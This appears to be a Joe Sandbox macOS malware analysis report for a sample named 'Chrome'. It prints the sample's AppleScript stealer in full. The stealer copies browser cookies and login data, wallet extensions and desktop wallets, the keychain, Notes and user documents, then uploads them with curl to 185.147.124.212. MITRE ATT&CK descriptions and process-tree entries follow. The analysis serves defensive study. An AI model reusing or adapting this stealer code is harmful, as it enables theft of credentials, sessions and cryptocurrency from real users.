'idpdilbfamoopcfofbipefhmmnflljfi', 'lbjapbcmmceacocpimbpbidpgmlmoaao', 'oiohdnannmknmdlddkdejbmplhbdcbee', 'fldfpgipfncgndfolcbkdeeknbbbnhcc', 'fpkhgmpbidmiogeglndfbkegfdlnajnf', 'lgmpcpglpngdoalbgeoldeajfclnhafa', 'ilhaljfiglknggcoegeknjghdgampffk', 'pfccjkejcgoppjnllalolplgogenfojk', 'cnmamaachppnkjgnildpdmkaakejnhae', 'eajafomhmkipbjmfmhebemolkcicgfmd', 'emeeapjkbcbpbpgaagfchmcgglmebnen', 'ibnejdfjmmkpcnlpebklmnkoeoihofec', 'hifafgmccdpekplomjjkcfgodnhcellj', 'ffnbelfdoeiohenkjibnmadjiehjhajb', 'fnjhmkhhmkbjkkabndcnnogagogbneec', 'bcopgchhojmggmffilplmbdicgaihlkp', 'cmoakldedjfnjofgbbfenefcagmedlga', 'ifckdpamphokdglkkdomedpdegcjhjdp', 'ibljocddagjghmlpgihahamcghfggcjc', 'cjmkndjhnagcfbpiemnkdpomccnjblmj', 'kbdcddcmgoplfockflacnnefaehaiocb', 'cgeeodpfagjceefieflmdfphplkenlfk', 'afbcbjpbpfadlkmhmclhkeeodmamcflc', 'fdchdcpieegfofnofhgdombfckhbcokj', 'gjlmehlldlphhljhpnlddaodbjjcchai', 'ellkdbaphhldpeajbepobaecooaoafpg', 'ojbcfhjmpigfobfclfflafhblgemeidi', 'ghlmndacnhlaekppcllcpcjjjomjkjpg', 'kgdijkcfiglijhaglibaidbipiejjfdp', 'abkahkcbhngaebpcgfmhkoioedceoigp', 'ammjlinfekkoockogfhdkgcohjlbhmff', 'pdliaogehgdbhbnmkklieghmmjkpigpa', 'jnlgamecbpmbajjfhmmmlhejkemejdma', 'nbdhibgjnjpnkajaghbffjbkcgljfgdi', 'jfdlamikmbghhapbgfoogdffldioobgl', 'fijngjgcjhjmmpcmkeiomlglpeiijkld', 'hgbeiipamcgbdjhfflifkgehomnmglgk', 'pmmnimefaichbcnbndcfpaagbepnjaig', 'cflgahhmjlmnjbikhakapcfkpbcmllam', 'keenhcnmdmjjhincpilijphpiohdppno', 'bipdhagncpgaccgdbddmbpcabgjikfkn', 'bcenedbpaaegpnijoadpdjiachahncdg', 'pocmplpaccanhmnllbbkpgfliimjljgo', 'klghhnkeealcohjjanjjdaeeggmfmlpl', 'cjookpbkjnpkmknedggeecikaponcalb', 'ojggmchlghnjlapmfbnjholfjkiidbch', 'dngmlblcodfobpdpecaadgfbcggfjfnm', 'jnldfbidonfeldmalbflbmlebbipcnle', 'ehjiblpccbknkgimiflboggcffmpphhp', 'agoakfejjabomempkjlepdflaleeobhb', 'fopmedgnkfpebgllppeddmmochcookhc', 'dmkamcknogkgcdfhhbddcghachkejeap', 'iglbgmakmggfkoidiagnhknlndljlolb', 'opfgelmcmbiajamepnmloijbpoleiama', 'gkeelndblnomfmjnophbhfhcjbcnemka', 'dgiehkgfknklegdhekgeabnhgfjhbajd', 'gafhhkghbfjjkeiendhlofajokpaflmk', 'imlcamfeniaidioeflifonfjeeppblda', 'penjlddjkjgpnkllboccdgccekpkcbin', 'nhnkbkgjikgcigadomkphalanndcapjk', 'egjidjbpglichdcondbcbdnbeeppgdph', 'dlcobpjiigpikoobohmabehhmhfoodbb', 'dldjpboieedgcmpkchcjcbijingjcgok', 'acmacodkjbdgmoleebolmdjonilkdbch', 'lccbohhgfkdikahanoclbdmaolidjdfl', 'pcndjhkinnkaohffealmlmhaepkpmgkb', 'gjagmgiddbbciopjhllkdnddhcglnemk', 'cnncmdhjacpkmjmkcafchppbnpnhdmon', 'mfgccjchihfkkindfppnaooecgfneiii', 'ieldiilncjhfkalnemgjbffmpomcaigi', 'ckklhkaabbmdjkahiaaplikpdddkenic', 'loinekcabhlmhjjbocijdoimmejangoa', 'mgffkfbidihjpoaomajlbgchddlicgpn', 'pnndplcbkakcplkjnolgbkdgjikjednm', 'mcohilncbfahbmgdjkbpemcciiolgcge', 'bgpipimickeadkjlklgciifhnalhdjhe', 'pdadjkfkgcafgbceimcpbkalnfnepbnk', 'jiidiaalihmmhddjgbnbgdfflelocpak', 'aeachknmefphepccionboohckonoeemg', 'gdokollfhmnbfckbobkdbakhilldkhcj', 'jiiigigdinhhgjflhljdkcelcjfmplnd', 'kmphdnilpmdejikjdnlbcnmnabepfgkh', 'jaooiolkmfcmloonphpiiogkfckgciom', 'fcckkdbjnoikooededlapcalpionmalo', 'mdnaglckomeedfbogeajfajofmfgpoae', 'ebfidpplhabeedpnhjnobghokpiioolj', 'dbgnhckhnppddckangcjbkjnlddbjkna', 'cpmkedoipcpimgecpmgpldfpohjplkpp', 'epapihdplajcdnnkdeiahlgigofloibg', 'iokeahhehimjnekafflcihljlcjccdbe', 'cihmoadaighcejopammfbmddcmdekcje', 'hnfanknocfeofbddgcijnmhnfnkdnaad', 'kilnpioakcdndlodeeceffgjdpojajlo', 'abogmiocnneedmmepnohnhlijcjpcifd', 'bofddndhbegljegmpmnlbhcejofmjgbn', 'aholpfdialjgjfhomihkjbmgjidlcdno', 'hdkobeeifhdplocklknbnejdelgagbao', 'oafedfoadhdjjcipmcbecikgokpaphjk', 'bfnaelmomeimhlpmgjnjophhpkkoljpa', 'nkbihfbeogaeaoehlefnkodbefgpgknn', 'lfmmjkfllhmfmkcobchabopkcefjkoip', 'aiifbnbfobpmeekipheeijimdpnlpgpp', 'anokgmphncpekkhclmingpimjmcooifb', 'mnfifefkajgofkcjkemidiaecocnkjeh', 'momakdpclmaphlamgjcndbgfckjfpemp', 'akkmagafhjjjjclaejjomkeccmjhdkpa', 'ehgjhhccekdedpbkifaojjaefeohnoea', 'mkpegjkblkkefacfnmkajcjmabijhclg', 'mlhakagmgkmonhdonhkpjeebfphligng', 'niiaamnmgebpeejeemoifgdndgeaekhe', 'jnmbobjmhlngoefaiojfljckilhhlhcj', 'onhogfjeacnfoofkfgppdlbmlmnplgbn', 'kppfdiipphfccemcignhifpjkapfbihd', 'hcjhpkgbmechpabifbggldplacolbkoh', 'flpiciilemghbmfalicajoolhkkenfel', 'mlbnicldlpdimbjdcncnklfempedeipj', 'cfbfdhimifdmdehjmkdobpcjfefblkjm', 'ocjobpilfplciaddcbafabcegbilnbnb', 'pgiaagfkgcbnmiiolekcfmljdagdhlcm', 'enabgbdfcbaehmbigakijjabdpdnimlg', 'bifidjkcdpgfnlbcjpdkdcnbiooooblg', 'lnnnmfcpbkafcpgdilckhmhbkkbpkmid', 'nlgbhdfgdhgbiamfdfmbikcdghidoadd', 'fcfcfllfndlomdhbehjjcoimbgofdncg', 'lpilbniiabackdjcionkobglmddfbcjo', 'efbglgofoippbgcjepnhiblaibcnclgk', 'fhbohimaelbohpjbbldcngcnapndodjp', 'gkodhkbmiflnmkipcmlhhgadebbeijhh', 'bocpokimicclpaiekenaeelehdjllofo', 'bhhhlbepdkbapadjdnnojkbgioiodbic', 'aflkmfhebedbjioipglgcbcmnbpgliof', 'mkchoaaiifodcflmbaphdgeidocajadp', 'mapbhaebnddapnmifbbkgeedkeplgjmf', 'lmkncnlpeipongihbffpljgehamdebgi', 'gjnckgkfmgmibbkoficdidcljeaaaheg', 'ppdadbejkmjnefldpcdjhnkpbjkikoip', 'bopcbmipnjdcdfflfgjdgdjejmgpoaab', 'kamfleanhcmjelnhaeljonilnmjpkcjc', 'cphhlgmgameodnhkjdmkpanlelnlohao', 'hnhobjmcibchnmglfbldbfabcgaknlkj', 'nknhiehlklippafakaeklbeglecifhad', 'kjjebdkfeagdoogagbhepmbimaphnfln', 'phkbamefinggmakgklpkljjmgibohnba', 'lakggbcodlaclcbbbepmkpdhbcomcgkd', 'ookjlbkiijinhpmnjffcofjonbfbgaoc', 'mdjmfdffdcmnoblignmgpommbefadffd', 'jblndlipeogpafnldhgmapagcccfchpi', 'hbbgbephgojikajhfbomhlmmollphcad', 'dpcklmdombjcplafheapiblogdlgjjlb', 'hmeobnfnfcmdkdcmlblgagmfpfboieaf', 'kmhcihpebfmpgmihbkipmjlmmioameka', 'kennjipeijpeengjlogfdjkiiadhbmjl', 'amkmjjmmflddogmhpjloimipbofnfjih', 'idnnbdplmphpflfnlkomgpfbpcgelopg', 'fmblappgoiilbgafhjklehhfifbdocee', 'heamnjbnflcikcggoiplibfommfbkjpj', 'khpkpbbcccdmmclmpigdgddabeilkdpd', 'omaabbefbmiijedngplfjmnooppbclkk', 'nhlnehondigmgckngjomcpcefcdplmgc', 'fiikommddbeccaoicoejoniammnalkfa', 'ejbidfepgijlcgahbmbckmnaljagjoll', 'glmhbknppefdmpemdmjnjlinpbclokhn', 'kncchdigobghenbbaddojjnnaogfppfj', 'hpclkefagolihohboafpheddmmgdffjm', 'ilolmnhjbbggkmopnemiphomhaojndmb', 'panpgppehdchfphcigocleabcmcgfoca'}set chromiumFiles to {'/Network/Cookies', '/Cookies', '/Web Data', '/Login Data', '/Local Extension Settings/', '/IndexedDB/'}repeat with chromium in chromium_mapset savePath to writemind & 'chromium/' & item 1 of chromium & '_'tryset fileList to list folder item 2 of chromium without invisiblesrepeat with currentItem in fileListif ((currentItem as string) is equal to 'Default') or ((currentItem as string) contains 'Profile') thenrepeat with CFile in chromiumFilesset readpath to (item 2 of chromium & currentItem & CFile)if ((CFile as string) is equal to '/Network/Cookies') thenset CFile to '/Cookies'end ifif ((CFile as string) is equal to '/Local Extension Settings/') thengrabPlugins(readpath, savePath & currentItem, pluginList, false)else if (CFile as string) is equal to '/IndexedDB/' thengrabPlugins(readpath, savePath & currentItem, pluginList, true)elseset writepath to savePath & currentItem & CFilereadwrite(readpath, writepath)end ifend repeatend ifend repeatend tryend repeatend chromiumon filegrabber()tryset destFolder to '/tmp/pizda/finder/'set destinationFolderPath to POSIX file destFolderset notesMedia to POSIX file (destFolder & 'NotesMedia/')set extensionsList to {'txt', 'pdf', 'docx', 'wallet', 'key', 'keys', 'doc', 'jpeg', 'png', 'kdbx'}set bankSize to 0set notesBankSize to 0set uuidString to do shell script 'system_profiler SPHardwareDataType \| awk \'/UUID/ { print $3 }\''mkdir(destinationFolderPath)mkdir(notesMedia)tell application 'Finder'tryset safariFolderPath to (path to home folder as text) & 'Library:Cookies:'duplicate file (safariFolderPath & 'Cookies.binarycookies') to folder destinationFolderPath with replacingset name of result to 'saf1'end tryset safariFolder to ((path to library folder from user domain as text) & 'Containers:com.apple.Safari:Data:Library:Cookies:')tryduplicate file 'Cookies.binarycookies' of folder safariFolder to folder destinationFolderPath with replacingend tryset notesFolderPath to (path to home folder as text) & 'Library:Group Containers:group.com.apple.notes:'tryset notesFolder to folder notesFolderPathset notesFiles to {'NoteStore.sqlite', 'NoteStore.sqlite-shm', 'NoteStore.sqlite-wal'}repeat with aFile in notesFilestryduplicate (file aFile of notesFolder) to folder destinationFolderPath with replacingend tryend repeatend tryset notesAccountsPath to (notesFolderPath & 'Accounts:')tryset notesAccountsFolder to folder notesAccountsPathset notesAccountsFiles to every folder of notesAccountsFolderrepeat with nFile in notesAccountsFilesset notesMediaPath to notesAccountsPath & name of nFile & ':Media:'set notesMediaProfiles to every folder of (folder notesMediaPath)repeat with profileFolder in notesMediaProfilesset notesMediaProfilesPath to notesMediaPath & name of profileFolderset notesMediaProfileFiles to every folder of (folder notesMediaProfilesPath)repeat with notesUUID in notesMediaProfileFilesset noteIdFiles to every file of notesUUIDrepeat with notesIdFile in noteIdFilestryset fileSize to size of notesIdFile as textset notesBankSize to notesBankSize + fileSizeif notesBankSize < 12 * 1024 * 1024 thenduplicate notesIdFile to notesMedia with replacingelseexit repeatend ifend tryend repeatend repeatend repeatend repeatend trytryset safariFolderPath to (path to library folder from user domain as text) & 'Safari:'duplicate (file 'Form Values' of folder safariFolderPath) to destinationFolderPath with replacingend trytryset keychainFolder to (path to library folder from user domain as text) & 'Keychains:' & uuidStringduplicate folder keychainFolder to destinationFolderPath with replacingend trytryset desktopFiles to every file of desktopset documentsFiles to every file of folder 'Documents' of (path to home folder)set downloadsFiles to every file of folder 'Downloads' of (path to home folder)repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles)set fileExtension to name extension of aFileif fileExtension is in extensionsList thenset fileSize to size of aFileif (bankSize + fileSize) < 10 * 1024 * 1024 thentryduplicate aFile to folder destinationFolderPath with replacingset bankSize to bankSize + fileSizeend tryelseexit repeatend ifend ifend repeatend tryend tellend tryend filegrabberon send_data(attempt)tryset result_send to (do shell script 'curl -X POST -H \'buildid: 28436ce126e642f78ac930fd45ac9c96\' -H \'username: vadim\' --data-binary @/tmp/out.zip http://185.147.124.212/log')on errorif attempt < 10 thendelay 60send_data(attempt + 1)end ifend tryend send_dataset profile to '/Users/' & usernameset writemind to '/tmp/pizda/'tryset result to (do shell script 'system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType')writeText(result, writemind & 'hardware')end tryset library to profile & '/Library/Application Support/'set password_entered to getpwd(username, writemind)delay 0.01set chromiumMap to {{'Chrome', library & 'Google/Chrome/'}, {'Brave', library & 'BraveSoftware/Brave-Browser/'}, {'Edge', library & 'Microsoft Edge/'}, {'Vivaldi', library & 'Vivaldi/'}, {'Opera', library & 'com.operasoftware.Opera/'}, {'OperaGX', library & 'com.operasoftware.OperaGX/'}, {'Chrome Beta', library & 'Google/Chrome Beta/'}, {'Chrome Canary', library & 'Google/Chrome Canary'}, {'Chromium', library & 'Chromium/'}, {'Chrome Dev', library & 'Google/Chrome Dev/'}}set walletMap to {{'deskwallets/Electrum', profile & '/.electrum/wallets/'}, {'deskwallets/Coinomi', library & 'Coinomi/wallets/'}, {'deskwallets/Exodus', library & 'Exodus/'}, {'deskwallets/Atomic', library & 'atomic/Local Storage/leveldb/'}, {'deskwallets/Wasabi', profile & '/.walletwasabi/client/Wallets/'}, {'deskwallets/Ledger_Live', library & 'Ledger Live/'}, {'deskwallets/Monero', profile & '/Monero/wallets/'}, {'deskwallets/Bitcoin_Core', library & 'Bitcoin/wallets/'}, {'deskwallets/Litecoin_Core', library & 'Litecoin/wallets/'}, {'deskwallets/Dash_Core', library & 'DashCore/wallets/'}, {'deskwallets/Electrum_LTC', profile & '/.electrum-ltc/wallets/'}, {'deskwallets/Electron_Cash', profile & '/.electron-cash/wallets/'}, {'deskwallets/Guarda', library & 'Guarda/'}, {'deskwallets/Dogecoin_Core', library & 'Dogecoin/wallets/'}, {'deskwallets/Trezor_Suite', library & '@trezor/suite-desktop/'}}readwrite(library & 'Binance/app-store.json', writemind & 'deskwallets/Binance/app-store.json')readwrite(library & '@tonkeeper/desktop/config.json', 'deskwallets/TonKeeper/config.json')readwrite(profile & '/Library/Keychains/login.keychain-db', writemind & 'kc')if release thenreadwrite(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite', writemind & 'FileGrabber/NoteStore.sqlite')readwrite(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal', writemind & 'FileGrabber/NoteStore.sqlite-wal')readwrite(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm', writemind & 'FileGrabber/NoteStore.sqlite-shm')readwrite(profile & '/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/Cookies.binarycookies')readwrite(profile & '/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/saf1')end ifif filegrabbers thenfilegrabber()end ifwriteText(username, writemind & 'user')set ff_paths to {{'Firefox', library & 'Firefox/Profiles/'}, {'Waterfox', library & 'Waterfox/Profiles/'}}repeat with gecko in ff_pathstryparseFF(item 1 of gecko, item 2 of gecko, writemind)end tryend repeatrepeat with deskwal in walletMapGrabFolder(item 2 of deskwal, writemind & item 1 of deskwal)end repeatchromium(writemind, chromiumMap)do shell script 'ditto -c -k --sequesterRsrc ' & writemind & ' /tmp/out.zip'send_data(0)do shell script 'rm -r ' & writeminddo shell script 'rm /tmp/out.zip'
File size:	43232 bytes
MD5 hash:	f13b7c85f3c1c08fae3b709a536281a1

Start time (UTC):	12:10:57
Start date (UTC):	14/03/2025
Path:	/usr/libexec/xpcproxy
Arguments:	-
File size:	44048 bytes
MD5 hash:	4764d9eafe6b7dac23253a9f8b7f73d6

Start time (UTC):	12:10:58
Start date (UTC):	14/03/2025
Path:	/usr/libexec/firmwarecheckers/eficheck/eficheck
Arguments:	/usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
File size:	74048 bytes
MD5 hash:	328beb81a2263449258057506bb4987f

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Tactics:	Execution
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment . Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Tactics:	Execution
Data Sources:	File: File Creation, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature , this activity will result in a valid signature.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

macOS Analysis Report Chrome

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

CodeSign Information

Static Mach Info

General Information for header 1

Symbols

General Information for header 2

Symbols

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

HTTPS Connections

System Behavior

Analysis Process: xpcproxy PID: 612, Parent PID: 1

General

Chronological Activities

Analysis Process: nsurlstoraged PID: 612, Parent PID: 1

General

Chronological Activities

Analysis Process: mono-sgen32 PID: 621, Parent PID: 537

General

Chronological Activities

Analysis Process: Chrome PID: 621, Parent PID: 537

General

Chronological Activities

Analysis Process: sh PID: 622, Parent PID: 621

General

Chronological Activities

Analysis Process: osascript PID: 622, Parent PID: 621

General

Chronological Activities

Analysis Process: sh PID: 623, Parent PID: 621

macOS Analysis Report
Chrome